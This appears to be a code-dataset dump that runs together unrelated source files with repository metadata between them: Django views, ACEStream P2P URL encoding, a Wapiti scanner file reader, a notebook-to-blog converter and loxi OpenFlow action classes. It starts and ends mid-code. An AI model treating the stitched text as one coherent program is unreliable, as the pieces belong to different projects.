except Bancoaudiovisuals.DoesNotExist:
biblioteca = None
return render_to_response('actores/bancoaudio/tus_aportes.html', {'persona':persona,'biblioteca':biblioteca})
#@csrf_protect
def agregar(request):
_username = request.user.username
id_usuario = User.objects.get(username=_username)
id_persona = get_object_or_404(PerfilPublico, user=id_usuario.id)
persona = get_object_or_404(Directorios, pk=id_persona.persona.id)
#if the request arrived via POST
if request.method == 'POST':
#form was submitted
banco_form = AgregarBancoaudiovisualsPublic(request.POST, request.FILES)
#validate the form
if banco_form.is_valid():
banco = banco_form.save()
today = datetime.now()
dateFormat = today.strftime("%Y-%m-%d")
tipocolaboracion = Tipocolaboracion.objects.get(id=15)
titulo = u'Colaboracion en Banco Audiovisual: %s' %(banco.id)
contribucion = Colaboradorespersonas(fecha=dateFormat,tipoColaboracion=tipocolaboracion,titulo=titulo,userupdate=id_usuario,persona=persona,estatu=3)
contribucion.save()
aporte = contriAudio(contribucion=contribucion,audio=banco)
aporte.save()
mensaje=True
return render_to_response('actores/bancoaudio/index.html',{'msm':mensaje,'persona':persona,'id_usuario':id_usuario})
else:
biblioteca_form = AgregarBancoaudiovisualsPublic(request.POST)
mensaje=True
return render_to_response('actores/bancoaudio/nuevo.html',{'form':banco_form,'msm':mensaje,'persona':persona,'usuario':id_usuario}, context_instance=RequestContext(request))
else:
#initial form
mensaje=False
banco_form = AgregarBancoaudiovisualsPublic()
return render_to_response('actores/bancoaudio/nuevo.html',{'form':banco_form,'persona':persona,'usuario':id_usuario}, context_instance=RequestContext(request))
def galeria(request,elemento,id):
if elemento == 'actor':
try:
datos = Actores.objects.get(id=id)
except Actores.DoesNotExist:
datos = None
if elemento == 'areas':
try:
datos = Areas.objects.get(id=id)
except Areas.DoesNotExist:
datos = None
if elemento == 'taxon':
try:
datos = DetalleTaxon.objects.get(id=id)
except DetalleTaxon.DoesNotExist:
datos = None
return render_to_response('actores/bancoaudio/galeria.html', {'elemento':datos})
def PaginadorGaleria(request,elemento,id,pagina):
if elemento == 'actor':
try:
datos = Actores.objects.get(id=id)
except Actores.DoesNotExist:
datos = None
if elemento == 'areas':
try:
datos = Areas.objects.get(id=id)
except Areas.DoesNotExist:
datos = None
if elemento == 'taxon':
try:
datos = DetalleTaxon.objects.get(id=id)
except DetalleTaxon.DoesNotExist:
datos = None
image_list = datos.bancoaudio.all()
paginator = Paginator(image_list, 4)
page = pagina
try:
mesn = paginator.page(page)
except PageNotAnInteger:
mesn = paginator.page(1)
return render_to_response('actores/bancoaudio/paginadorGaleria.html', {'elemento':elemento,'mesn':mesn,'id':id})
def PaginadorGaleria2(request,pagina,id):
try:
dat = Bancoaudiovisuals.objects.get(pk=id)
except Bancoaudiovisuals.DoesNotExist:
dat = None
try:
datos = Bancoaudiovisuals.objects.filter()
except Bancoaudiovisuals.DoesNotExist:
datos = None
# image_list = datos.all()
paginator = Paginator(datos, 10)
page = pagina
try:
mesn = paginator.page(page)
except PageNotAnInteger:
mesn = paginator.page(1)
return render_to_response('actores/bancoaudio/paginadorGaleria2.html', {'mesn':mesn,'dat':dat})
def bancoVer(request,id):
try:
datos = Bancoaudiovisuals.objects.get(pk=id)
except Bancoaudiovisuals.DoesNotExist:
datos = None
return render_to_response('actores/bancoaudio/bancover.html', {'datos':datos})
|
gpl-3.0
| 5,877,501,885,763,019,000
| 36.364865
| 188
| 0.664142
| false
| 3.216997
| false
| false
| false
|
aplicatii-romanesti/allinclusive-kodi-pi
|
.kodi/userdata/addon_data/plugin.video.p2p-streams/acestream/ace/ACEStream/Core/APIImplementation/makeurl.py
|
1
|
8330
|
#Embedded file name: ACEStream\Core\APIImplementation\makeurl.pyo
import sys
import urlparse
import urllib
import math
#if sys.platform != 'win32':
# import curses.ascii
from types import IntType, LongType
from struct import pack, unpack
from base64 import b64encode, b64decode
from M2Crypto import Rand
from traceback import print_exc, print_stack
from ACEStream.Core.simpledefs import *
from ACEStream.Core.Utilities.TSCrypto import sha
DEBUG = False
def metainfo2p2purl(metainfo):
info = metainfo['info']
bitrate = None
if 'azureus_properties' in metainfo:
azprops = metainfo['azureus_properties']
if 'Content' in azprops:
content = metainfo['azureus_properties']['Content']
if 'Speed Bps' in content:
bitrate = content['Speed Bps']
if 'encoding' not in metainfo:
encoding = 'utf-8'
else:
encoding = metainfo['encoding']
urldict = {}
urldict['s'] = p2purl_encode_piecelength(info['piece length'])
urldict['n'] = p2purl_encode_name2url(info['name'], encoding)
if info.has_key('length'):
urldict['l'] = p2purl_encode_nnumber(info['length'])
else:
raise ValueError('Multi-file torrents currently not supported')
if info.has_key('root hash'):
urldict['r'] = b64urlencode(info['root hash'])
elif info.has_key('live'):
urldict['k'] = b64urlencode(info['live']['pubkey'])
urldict['a'] = info['live']['authmethod']
else:
raise ValueError('url-compat and Merkle torrent must be on to create URL')
if bitrate is not None:
urldict['b'] = p2purl_encode_nnumber(bitrate)
query = ''
for k in ['n',
'r',
'k',
'l',
's',
'a',
'b']:
if k in urldict:
if query != '':
query += '&'
v = urldict[k]
if k == 'n':
s = v
else:
s = k + '=' + v
query += s
sidx = metainfo['announce'].find(':')
hierpart = metainfo['announce'][sidx + 1:]
url = P2PURL_SCHEME + ':' + hierpart + '?' + query
return url
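# Illustrative shape of the produced URL (values hypothetical; the scheme
# prefix comes from P2PURL_SCHEME in simpledefs):
#   <scheme>://tracker.example.org/announce?My+Video.ogv&r=<b64url root hash>&l=<enc length>&s=<log2 piece size>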
def p2purl2metainfo(url):
if DEBUG:
print >> sys.stderr, 'p2purl2metainfo: URL', url
colidx = url.find(':')
scheme = url[0:colidx]
qidx = url.find('?')
if qidx == -1:
authority = None
path = None
query = url[colidx + 1:]
fragment = None
else:
authoritypath = url[colidx + 3:qidx]
pidx = authoritypath.find('/')
authority = authoritypath[0:pidx]
path = authoritypath[pidx:]
fidx = url.find('#')
if fidx == -1:
query = url[qidx + 1:]
fragment = None
else:
query = url[qidx + 1:fidx]
fragment = url[fidx:]
csbidx = authority.find(']')
if authority.startswith('[') and csbidx != -1:
if csbidx == len(authority) - 1:
port = None
else:
port = authority[csbidx + 1:]
else:
cidx = authority.find(':')
if cidx != -1:
port = authority[cidx + 1:]
else:
port = None
if port is not None and not port.isdigit():
raise ValueError('Port not int')
if scheme != P2PURL_SCHEME:
raise ValueError('Unknown scheme ' + P2PURL_SCHEME)
metainfo = {}
if authority and path:
metainfo['announce'] = 'http://' + authority + path
result = urlparse.urlparse(metainfo['announce'])
if result[0] != 'http':
raise ValueError('Malformed tracker URL')
reqinfo = p2purl_parse_query(query)
metainfo.update(reqinfo)
swarmid = metainfo2swarmid(metainfo)
if DEBUG:
print >> sys.stderr, 'p2purl2metainfo: parsed', `metainfo`
return (metainfo, swarmid)
def metainfo2swarmid(metainfo):
if 'live' in metainfo['info']:
swarmid = pubkey2swarmid(metainfo['info']['live'])
else:
swarmid = metainfo['info']['root hash']
return swarmid
def p2purl_parse_query(query):
if DEBUG:
print >> sys.stderr, 'p2purl_parse_query: query', query
gotname = False
gotkey = False
gotrh = False
gotlen = False
gotps = False
gotam = False
gotbps = False
reqinfo = {}
reqinfo['info'] = {}
kvs = query.split('&')
for kv in kvs:
if '=' not in kv:
reqinfo['info']['name'] = p2purl_decode_name2utf8(kv)
reqinfo['encoding'] = 'UTF-8'
gotname = True
continue
k, v = kv.split('=')
# both the 'k' and 'a' keys need the live dict; parenthesized so a 'k' key
# cannot recreate the dict and drop an authmethod stored by an earlier 'a'
if (k == 'k' or k == 'a') and 'live' not in reqinfo['info']:
reqinfo['info']['live'] = {}
if k == 'n':
reqinfo['info']['name'] = p2purl_decode_name2utf8(v)
reqinfo['encoding'] = 'UTF-8'
gotname = True
elif k == 'r':
reqinfo['info']['root hash'] = p2purl_decode_base64url(v)
gotrh = True
elif k == 'k':
reqinfo['info']['live']['pubkey'] = p2purl_decode_base64url(v)
gotkey = True
elif k == 'l':
reqinfo['info']['length'] = p2purl_decode_nnumber(v)
gotlen = True
elif k == 's':
reqinfo['info']['piece length'] = p2purl_decode_piecelength(v)
gotps = True
elif k == 'a':
reqinfo['info']['live']['authmethod'] = v
gotam = True
elif k == 'b':
bitrate = p2purl_decode_nnumber(v)
reqinfo['azureus_properties'] = {}
reqinfo['azureus_properties']['Content'] = {}
reqinfo['azureus_properties']['Content']['Speed Bps'] = bitrate
gotbps = True
if not gotname:
raise ValueError('Missing name field')
if not gotrh and not gotkey:
raise ValueError('Missing root hash or live pub key field')
if gotrh and gotkey:
raise ValueError('Found both root hash and live pub key field')
if not gotlen:
raise ValueError('Missing length field')
if not gotps:
raise ValueError('Missing piece size field')
if gotkey and not gotam:
raise ValueError('Missing live authentication method field')
if gotrh and gotam:
raise ValueError('Inconsistent: root hash and live authentication method field')
if not gotbps:
raise ValueError('Missing bitrate field')
return reqinfo
def pubkey2swarmid(livedict):
if DEBUG:
print >> sys.stderr, 'pubkey2swarmid:', livedict.keys()
if livedict['authmethod'] == 'None':
return Rand.rand_bytes(20)
else:
return sha(livedict['pubkey']).digest()
def p2purl_decode_name2utf8(v):
# The per-character ASCII check from upstream is disabled here because
# curses.ascii is not imported in this build; it raised
# ValueError('Name contains unescaped 8-bit value ' + `c`) on non-ASCII input.
return urllib.unquote_plus(v)
def p2purl_encode_name2url(name, encoding):
if encoding.lower() == 'utf-8':
utf8name = name
else:
uname = unicode(name, encoding)
utf8name = uname.encode('utf-8')
return urllib.quote_plus(utf8name)
def p2purl_decode_base64url(v):
return b64urldecode(v)
def p2purl_decode_nnumber(s):
b = b64urldecode(s)
if len(b) == 2:
format = 'H'
elif len(b) == 4:
format = 'l'
else:
format = 'Q'
format = '!' + format
return unpack(format, b)[0]
def p2purl_encode_nnumber(s):
if type(s) == IntType:
if s < 65536:
format = 'H'
elif s < 4294967296L:
format = 'l'
else:
format = 'Q'
format = '!' + format
return b64urlencode(pack(format, s))
def p2purl_decode_piecelength(s):
return int(math.pow(2.0, float(s)))
def p2purl_encode_piecelength(s):
return str(int(math.log(float(s), 2.0)))
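# Quick sanity check (illustrative): piece lengths travel as log2 exponents,
#   p2purl_encode_piecelength(32768)    # -> '15'
#   p2purl_decode_piecelength('15')     # -> 32768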
def b64urlencode(input):
output = b64encode(input)
output = output.rstrip('=')
output = output.replace('+', '-')
output = output.replace('/', '_')
return output
def b64urldecode(input):
inter = input[:]
padlen = 4 - (len(inter) - len(inter) / 4 * 4)
padstr = '=' * padlen
inter += padstr
inter = inter.replace('-', '+')
inter = inter.replace('_', '/')
output = b64decode(inter)
return output
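# Round-trip sketch: the URL-safe variant swaps '+/' for '-_' and strips '='
# padding, so for any byte string s,
#   b64urldecode(b64urlencode(s)) == s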
|
apache-2.0
| -7,401,510,805,719,010,000
| 28.964029
| 88
| 0.560624
| false
| 3.550725
| false
| false
| false
|
teknolab/teknolab-wapiti
|
wapiti/file/auxtext.py
|
1
|
1712
|
#!/usr/bin/env python
# XML Report Generator Module for Wapiti Project
# Wapiti Project (http://wapiti.sourceforge.net)
#
# David del Pozo
# Alberto Pastor
# Copyright (C) 2008 Informatica Gesfor
# ICT Romulus (http://www.ict-romulus.eu)
#
# This program is free software; you can redistribute it and/or modify
# it under the terms of the GNU General Public License as published by
# the Free Software Foundation; either version 2 of the License, or
# (at your option) any later version.
#
# This program is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU General Public License for more details.
#
# You should have received a copy of the GNU General Public License
# along with this program; if not, write to the Free Software
# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA
class AuxText:
"""Class for reading and writing in text files"""
def readLines(self, fileName):
"""returns an array of the file's non-empty lines"""
lines = []
f = None
try:
f = open(fileName)
for line in f:
cleanLine = line.strip(" \n")
if cleanLine != "":
lines.append(cleanLine.replace("\\0","\0"))
except IOError,e:
print e
#finally clause do not work with jyton
#finally:
#if f!=None:
#f.close()
return lines
#class
if __name__ == "__main__":
try:
l = AuxText()
ll = l.readLines("./config/execPayloads.txt")
for li in ll:
print li
except SystemExit:
pass
|
gpl-2.0
| -7,611,681,490,759,631,000
| 31.301887
| 76
| 0.626752
| false
| 3.9447
| false
| false
| false
|
liyangbit/liyangbit.github.io
|
_to-ipynb.py
|
1
|
4868
|
import os, re
import shutil
import csv
import datetime
# Main
thepath = os.getcwd()
ipynb_path = os.path.join(thepath, 'ipynb')
yaml_csv_path = os.path.join(ipynb_path, r'_post_head.csv')
today = datetime.datetime.today()
today = '{}-{:0>2d}-{:0>2d}'.format(today.year, today.month, today.day)
# Read head string from "_post_head.csv"
with open(yaml_csv_path, 'r', encoding="utf8") as f:
hasPost = False
for row in csv.reader(f):
if len(row) == 1: # First line is the default post name
fname = row[0]
continue
if fname == row[1]:
if not os.path.isfile(os.path.join(ipynb_path, '{}.ipynb'.format(fname))):
print('\n\tWarning: "{}.ipynb" doesn\'t exist.\n\n'.format(fname))
exit()
date = row[0]
updatestr = ""
headstr = '---\n'
headstr += 'layout: posts\n'
headstr += 'title: {}\n'.format(row[2])
# headstr += 'categories: {}\n'.format(row[3])
# if date != today:
# headstr += 'update: {}\n'.format(today)
# headstr += 'tags: {}\n---\n\n'.format(row[4])
headstr += '---\n\n'
hasPost = True
break
if not hasPost:
print('\n\tError: No record relevant to "{}" in csv file.\n\n'.format(fname))
exit()
ipynb_image_path = os.path.join(ipynb_path, r'{}_files'.format(fname))
destination_path = os.path.join(os.path.join(thepath, 'assets'), 'ipynb-images')
post_path = os.path.join(thepath, r'_posts/{}.md').format(date + '-' + fname)
# Convert ipynb to markdown
os.system('jupyter nbconvert --to markdown ipynb/{}.ipynb'.format(fname))
# Move it to "/_posts" and rename it
shutil.move(os.path.join(ipynb_path, '{}.md'.format(fname)), os.path.join(thepath, r'_posts/{}.md').format(fname))
if os.path.isfile(post_path):
os.remove(post_path)
os.rename(os.path.join(thepath, r'_posts/{}.md').format(fname), post_path)
# Move the images under "/ipynb/<fname>_files" to "/assets/ipynb-images"
def moveallfiles(origindir, destinationdir, filename):
if not os.path.exists(origindir):
return
# Delete all image files which contain "fname" in their filename
for file in os.listdir(destinationdir):
if file[:len(filename)] == filename:
os.remove(os.path.join(destinationdir, file))
for file in os.listdir(origindir):
originfile = os.path.join(origindir, file)
destinationfile = os.path.join(destinationdir, file)
# If it exists, then delete it and then conduct the movement
if os.path.isfile(destinationfile):
os.remove(destinationfile)
shutil.move(originfile, destinationfile)
# Delete the origin image path
shutil.rmtree(ipynb_image_path)
moveallfiles(ipynb_image_path, destination_path, fname)
with open(post_path, 'r', encoding='utf8') as f:
fstr = f.read()
# Replace the image link strings
fstr = re.compile(r'{}_files'.format(fname)).sub(r'https://liyangbit.github.io/assets/ipynb-images', fstr)
fstr = headstr + fstr
# Convert HTML table to markdown table
def transfertable(tablehtml):
tablehtml = re.compile(r'<table>').sub('', tablehtml)
tablehtml = re.compile(r'</tbody>[\n]</table>').sub('', tablehtml)
# Table head
tablehtml = re.compile(r'<tr><th>').sub(r'#', tablehtml)
tablehead = re.compile(r'<thead>[\S\s]*?</thead>').findall(tablehtml)
if tablehead:
tablehead = tablehead[0]
# Headline
col_num = len(re.compile(r'</th>').findall(tablehead))
tablehtml = re.compile(r'<tbody>').sub('|' + ' --- |' * col_num, tablehtml)
headcontent = re.compile(r'(?<=>)[\S]*?(?=</th>)').findall(tablehead)
newhead = '| ' + ' | '.join(headcontent) + ' |'
tablehtml = re.compile(tablehead).sub(newhead, tablehtml)
# First column
firstcol = re.compile(r'(?<=\s)<tr>[\S\s]*?<td>').findall(tablehtml)
for cell in firstcol:
origincell = cell
cell = re.compile(r'<tr><th[^>]*?>').sub('| **', cell)
cell = re.compile(r'</th><td>').sub('** | ', cell)
tablehtml = re.compile('\t' + origincell).sub(cell, tablehtml)
# Table body
tablehtml = re.compile(r'<tr><td>').sub('| ', tablehtml)
tablehtml = re.compile(r'</td></tr>').sub(' |', tablehtml)
tablehtml = re.compile(r'</th><td>').sub(' | ', tablehtml)
tablehtml = re.compile(r'</td><td>').sub(' | ', tablehtml)
# Final Check
tablehtml = re.compile(r'<tbody>').sub("", tablehtml)
return tablehtml
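# Illustrative effect (sketch): a pandas-style HTML table is rewritten into
# pipe-delimited markdown, e.g. header cells become '| a | b |' followed by a
# '| --- | --- |' separator row and one '| ... |' line per body row.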
tablehtmllst = re.compile(r'<table>[\s\S]*?</table>').findall(fstr)
if tablehtmllst:
for table in tablehtmllst:
fstr = re.compile(table).sub(transfertable(table), fstr)
os.remove(post_path)
fstr = re.sub(r"\n{5,}", "\n", fstr)
with open(post_path, 'w', encoding='utf8') as f:
f.write(fstr)
|
mit
| 7,849,797,015,370,449,000
| 37.944
| 114
| 0.604766
| false
| 3.098663
| false
| false
| false
|
gzamboni/sdnResilience
|
loxi/of12/action.py
|
1
|
32027
|
# Copyright (c) 2008 The Board of Trustees of The Leland Stanford Junior University
# Copyright (c) 2011, 2012 Open Networking Foundation
# Copyright (c) 2012, 2013 Big Switch Networks, Inc.
# See the file LICENSE.pyloxi which should have been included in the source distribution
# Automatically generated by LOXI from template module.py
# Do not modify
import struct
import loxi
import util
import loxi.generic_util
import sys
ofp = sys.modules['loxi.of12']
class action(loxi.OFObject):
subtypes = {}
def __init__(self, type=None):
if type != None:
self.type = type
else:
self.type = 0
return
def pack(self):
packed = []
packed.append(struct.pack("!H", self.type))
packed.append(struct.pack("!H", 0)) # placeholder for len at index 1
packed.append('\x00' * 4)
length = sum([len(x) for x in packed])
packed[1] = struct.pack("!H", length)
return ''.join(packed)
@staticmethod
def unpack(reader):
subtype, = reader.peek('!H', 0)
subclass = action.subtypes.get(subtype)
if subclass:
return subclass.unpack(reader)
obj = action()
obj.type = reader.read("!H")[0]
_len = reader.read("!H")[0]
orig_reader = reader
reader = orig_reader.slice(_len, 4)
reader.skip(4)
return obj
def __eq__(self, other):
if type(self) != type(other): return False
if self.type != other.type: return False
return True
def pretty_print(self, q):
q.text("action {")
with q.group():
with q.indent(2):
q.breakable()
q.breakable()
q.text('}')
class experimenter(action):
subtypes = {}
type = 65535
def __init__(self, experimenter=None, data=None):
if experimenter != None:
self.experimenter = experimenter
else:
self.experimenter = 0
if data != None:
self.data = data
else:
self.data = ''
return
def pack(self):
packed = []
packed.append(struct.pack("!H", self.type))
packed.append(struct.pack("!H", 0)) # placeholder for len at index 1
packed.append(struct.pack("!L", self.experimenter))
packed.append(self.data)
length = sum([len(x) for x in packed])
packed.append(loxi.generic_util.pad_to(8, length))
length += len(packed[-1])
packed[1] = struct.pack("!H", length)
return ''.join(packed)
@staticmethod
def unpack(reader):
subtype, = reader.peek('!L', 4)
subclass = experimenter.subtypes.get(subtype)
if subclass:
return subclass.unpack(reader)
obj = experimenter()
_type = reader.read("!H")[0]
assert(_type == 65535)
_len = reader.read("!H")[0]
orig_reader = reader
reader = orig_reader.slice(_len, 4)
obj.experimenter = reader.read("!L")[0]
obj.data = str(reader.read_all())
return obj
def __eq__(self, other):
if type(self) != type(other): return False
if self.experimenter != other.experimenter: return False
if self.data != other.data: return False
return True
def pretty_print(self, q):
q.text("experimenter {")
with q.group():
with q.indent(2):
q.breakable()
q.text("data = ");
q.pp(self.data)
q.breakable()
q.text('}')
action.subtypes[65535] = experimenter
class bsn(experimenter):
subtypes = {}
type = 65535
experimenter = 6035143
def __init__(self, subtype=None):
if subtype != None:
self.subtype = subtype
else:
self.subtype = 0
return
def pack(self):
packed = []
packed.append(struct.pack("!H", self.type))
packed.append(struct.pack("!H", 0)) # placeholder for len at index 1
packed.append(struct.pack("!L", self.experimenter))
packed.append(struct.pack("!L", self.subtype))
packed.append('\x00' * 4)
length = sum([len(x) for x in packed])
packed[1] = struct.pack("!H", length)
return ''.join(packed)
@staticmethod
def unpack(reader):
subtype, = reader.peek('!L', 8)
subclass = bsn.subtypes.get(subtype)
if subclass:
return subclass.unpack(reader)
obj = bsn()
_type = reader.read("!H")[0]
assert(_type == 65535)
_len = reader.read("!H")[0]
orig_reader = reader
reader = orig_reader.slice(_len, 4)
_experimenter = reader.read("!L")[0]
assert(_experimenter == 6035143)
obj.subtype = reader.read("!L")[0]
reader.skip(4)
return obj
def __eq__(self, other):
if type(self) != type(other): return False
if self.subtype != other.subtype: return False
return True
def pretty_print(self, q):
q.text("bsn {")
with q.group():
with q.indent(2):
q.breakable()
q.breakable()
q.text('}')
experimenter.subtypes[6035143] = bsn
class bsn_checksum(bsn):
type = 65535
experimenter = 6035143
subtype = 4
def __init__(self, checksum=None):
if checksum != None:
self.checksum = checksum
else:
self.checksum = 0
return
def pack(self):
packed = []
packed.append(struct.pack("!H", self.type))
packed.append(struct.pack("!H", 0)) # placeholder for len at index 1
packed.append(struct.pack("!L", self.experimenter))
packed.append(struct.pack("!L", self.subtype))
packed.append(util.pack_checksum_128(self.checksum))
length = sum([len(x) for x in packed])
packed[1] = struct.pack("!H", length)
return ''.join(packed)
@staticmethod
def unpack(reader):
obj = bsn_checksum()
_type = reader.read("!H")[0]
assert(_type == 65535)
_len = reader.read("!H")[0]
orig_reader = reader
reader = orig_reader.slice(_len, 4)
_experimenter = reader.read("!L")[0]
assert(_experimenter == 6035143)
_subtype = reader.read("!L")[0]
assert(_subtype == 4)
obj.checksum = util.unpack_checksum_128(reader)
return obj
def __eq__(self, other):
if type(self) != type(other): return False
if self.checksum != other.checksum: return False
return True
def pretty_print(self, q):
q.text("bsn_checksum {")
with q.group():
with q.indent(2):
q.breakable()
q.text("checksum = ");
q.pp(self.checksum)
q.breakable()
q.text('}')
bsn.subtypes[4] = bsn_checksum
class bsn_mirror(bsn):
type = 65535
experimenter = 6035143
subtype = 1
def __init__(self, dest_port=None, vlan_tag=None, copy_stage=None):
if dest_port != None:
self.dest_port = dest_port
else:
self.dest_port = 0
if vlan_tag != None:
self.vlan_tag = vlan_tag
else:
self.vlan_tag = 0
if copy_stage != None:
self.copy_stage = copy_stage
else:
self.copy_stage = 0
return
def pack(self):
packed = []
packed.append(struct.pack("!H", self.type))
packed.append(struct.pack("!H", 0)) # placeholder for len at index 1
packed.append(struct.pack("!L", self.experimenter))
packed.append(struct.pack("!L", self.subtype))
packed.append(struct.pack("!L", self.dest_port))
packed.append(struct.pack("!L", self.vlan_tag))
packed.append(struct.pack("!B", self.copy_stage))
packed.append('\x00' * 3)
length = sum([len(x) for x in packed])
packed[1] = struct.pack("!H", length)
return ''.join(packed)
@staticmethod
def unpack(reader):
obj = bsn_mirror()
_type = reader.read("!H")[0]
assert(_type == 65535)
_len = reader.read("!H")[0]
orig_reader = reader
reader = orig_reader.slice(_len, 4)
_experimenter = reader.read("!L")[0]
assert(_experimenter == 6035143)
_subtype = reader.read("!L")[0]
assert(_subtype == 1)
obj.dest_port = reader.read("!L")[0]
obj.vlan_tag = reader.read("!L")[0]
obj.copy_stage = reader.read("!B")[0]
reader.skip(3)
return obj
def __eq__(self, other):
if type(self) != type(other): return False
if self.dest_port != other.dest_port: return False
if self.vlan_tag != other.vlan_tag: return False
if self.copy_stage != other.copy_stage: return False
return True
def pretty_print(self, q):
q.text("bsn_mirror {")
with q.group():
with q.indent(2):
q.breakable()
q.text("dest_port = ");
q.text("%#x" % self.dest_port)
q.text(","); q.breakable()
q.text("vlan_tag = ");
q.text("%#x" % self.vlan_tag)
q.text(","); q.breakable()
q.text("copy_stage = ");
q.text("%#x" % self.copy_stage)
q.breakable()
q.text('}')
bsn.subtypes[1] = bsn_mirror
class bsn_set_tunnel_dst(bsn):
type = 65535
experimenter = 6035143
subtype = 2
def __init__(self, dst=None):
if dst != None:
self.dst = dst
else:
self.dst = 0
return
def pack(self):
packed = []
packed.append(struct.pack("!H", self.type))
packed.append(struct.pack("!H", 0)) # placeholder for len at index 1
packed.append(struct.pack("!L", self.experimenter))
packed.append(struct.pack("!L", self.subtype))
packed.append(struct.pack("!L", self.dst))
length = sum([len(x) for x in packed])
packed[1] = struct.pack("!H", length)
return ''.join(packed)
@staticmethod
def unpack(reader):
obj = bsn_set_tunnel_dst()
_type = reader.read("!H")[0]
assert(_type == 65535)
_len = reader.read("!H")[0]
orig_reader = reader
reader = orig_reader.slice(_len, 4)
_experimenter = reader.read("!L")[0]
assert(_experimenter == 6035143)
_subtype = reader.read("!L")[0]
assert(_subtype == 2)
obj.dst = reader.read("!L")[0]
return obj
def __eq__(self, other):
if type(self) != type(other): return False
if self.dst != other.dst: return False
return True
def pretty_print(self, q):
q.text("bsn_set_tunnel_dst {")
with q.group():
with q.indent(2):
q.breakable()
q.text("dst = ");
q.text("%#x" % self.dst)
q.breakable()
q.text('}')
bsn.subtypes[2] = bsn_set_tunnel_dst
class copy_ttl_in(action):
type = 12
def __init__(self):
return
def pack(self):
packed = []
packed.append(struct.pack("!H", self.type))
packed.append(struct.pack("!H", 0)) # placeholder for len at index 1
packed.append('\x00' * 4)
length = sum([len(x) for x in packed])
packed[1] = struct.pack("!H", length)
return ''.join(packed)
@staticmethod
def unpack(reader):
obj = copy_ttl_in()
_type = reader.read("!H")[0]
assert(_type == 12)
_len = reader.read("!H")[0]
orig_reader = reader
reader = orig_reader.slice(_len, 4)
reader.skip(4)
return obj
def __eq__(self, other):
if type(self) != type(other): return False
return True
def pretty_print(self, q):
q.text("copy_ttl_in {")
with q.group():
with q.indent(2):
q.breakable()
q.breakable()
q.text('}')
action.subtypes[12] = copy_ttl_in
class copy_ttl_out(action):
type = 11
def __init__(self):
return
def pack(self):
packed = []
packed.append(struct.pack("!H", self.type))
packed.append(struct.pack("!H", 0)) # placeholder for len at index 1
packed.append('\x00' * 4)
length = sum([len(x) for x in packed])
packed[1] = struct.pack("!H", length)
return ''.join(packed)
@staticmethod
def unpack(reader):
obj = copy_ttl_out()
_type = reader.read("!H")[0]
assert(_type == 11)
_len = reader.read("!H")[0]
orig_reader = reader
reader = orig_reader.slice(_len, 4)
reader.skip(4)
return obj
def __eq__(self, other):
if type(self) != type(other): return False
return True
def pretty_print(self, q):
q.text("copy_ttl_out {")
with q.group():
with q.indent(2):
q.breakable()
q.breakable()
q.text('}')
action.subtypes[11] = copy_ttl_out
class dec_mpls_ttl(action):
type = 16
def __init__(self):
return
def pack(self):
packed = []
packed.append(struct.pack("!H", self.type))
packed.append(struct.pack("!H", 0)) # placeholder for len at index 1
packed.append('\x00' * 4)
length = sum([len(x) for x in packed])
packed[1] = struct.pack("!H", length)
return ''.join(packed)
@staticmethod
def unpack(reader):
obj = dec_mpls_ttl()
_type = reader.read("!H")[0]
assert(_type == 16)
_len = reader.read("!H")[0]
orig_reader = reader
reader = orig_reader.slice(_len, 4)
reader.skip(4)
return obj
def __eq__(self, other):
if type(self) != type(other): return False
return True
def pretty_print(self, q):
q.text("dec_mpls_ttl {")
with q.group():
with q.indent(2):
q.breakable()
q.breakable()
q.text('}')
action.subtypes[16] = dec_mpls_ttl
class dec_nw_ttl(action):
type = 24
def __init__(self):
return
def pack(self):
packed = []
packed.append(struct.pack("!H", self.type))
packed.append(struct.pack("!H", 0)) # placeholder for len at index 1
packed.append('\x00' * 4)
length = sum([len(x) for x in packed])
packed[1] = struct.pack("!H", length)
return ''.join(packed)
@staticmethod
def unpack(reader):
obj = dec_nw_ttl()
_type = reader.read("!H")[0]
assert(_type == 24)
_len = reader.read("!H")[0]
orig_reader = reader
reader = orig_reader.slice(_len, 4)
reader.skip(4)
return obj
def __eq__(self, other):
if type(self) != type(other): return False
return True
def pretty_print(self, q):
q.text("dec_nw_ttl {")
with q.group():
with q.indent(2):
q.breakable()
q.breakable()
q.text('}')
action.subtypes[24] = dec_nw_ttl
class group(action):
type = 22
def __init__(self, group_id=None):
if group_id != None:
self.group_id = group_id
else:
self.group_id = 0
return
def pack(self):
packed = []
packed.append(struct.pack("!H", self.type))
packed.append(struct.pack("!H", 0)) # placeholder for len at index 1
packed.append(struct.pack("!L", self.group_id))
length = sum([len(x) for x in packed])
packed[1] = struct.pack("!H", length)
return ''.join(packed)
@staticmethod
def unpack(reader):
obj = group()
_type = reader.read("!H")[0]
assert(_type == 22)
_len = reader.read("!H")[0]
orig_reader = reader
reader = orig_reader.slice(_len, 4)
obj.group_id = reader.read("!L")[0]
return obj
def __eq__(self, other):
if type(self) != type(other): return False
if self.group_id != other.group_id: return False
return True
def pretty_print(self, q):
q.text("group {")
with q.group():
with q.indent(2):
q.breakable()
q.text("group_id = ");
q.text("%#x" % self.group_id)
q.breakable()
q.text('}')
action.subtypes[22] = group
class nicira(experimenter):
subtypes = {}
type = 65535
experimenter = 8992
def __init__(self, subtype=None):
if subtype != None:
self.subtype = subtype
else:
self.subtype = 0
return
def pack(self):
packed = []
packed.append(struct.pack("!H", self.type))
packed.append(struct.pack("!H", 0)) # placeholder for len at index 1
packed.append(struct.pack("!L", self.experimenter))
packed.append(struct.pack("!H", self.subtype))
packed.append('\x00' * 2)
packed.append('\x00' * 4)
length = sum([len(x) for x in packed])
packed[1] = struct.pack("!H", length)
return ''.join(packed)
@staticmethod
def unpack(reader):
subtype, = reader.peek('!H', 8)
subclass = nicira.subtypes.get(subtype)
if subclass:
return subclass.unpack(reader)
obj = nicira()
_type = reader.read("!H")[0]
assert(_type == 65535)
_len = reader.read("!H")[0]
orig_reader = reader
reader = orig_reader.slice(_len, 4)
_experimenter = reader.read("!L")[0]
assert(_experimenter == 8992)
obj.subtype = reader.read("!H")[0]
reader.skip(2)
reader.skip(4)
return obj
def __eq__(self, other):
if type(self) != type(other): return False
if self.subtype != other.subtype: return False
return True
def pretty_print(self, q):
q.text("nicira {")
with q.group():
with q.indent(2):
q.breakable()
q.breakable()
q.text('}')
experimenter.subtypes[8992] = nicira
class nicira_dec_ttl(nicira):
type = 65535
experimenter = 8992
subtype = 18
def __init__(self):
return
def pack(self):
packed = []
packed.append(struct.pack("!H", self.type))
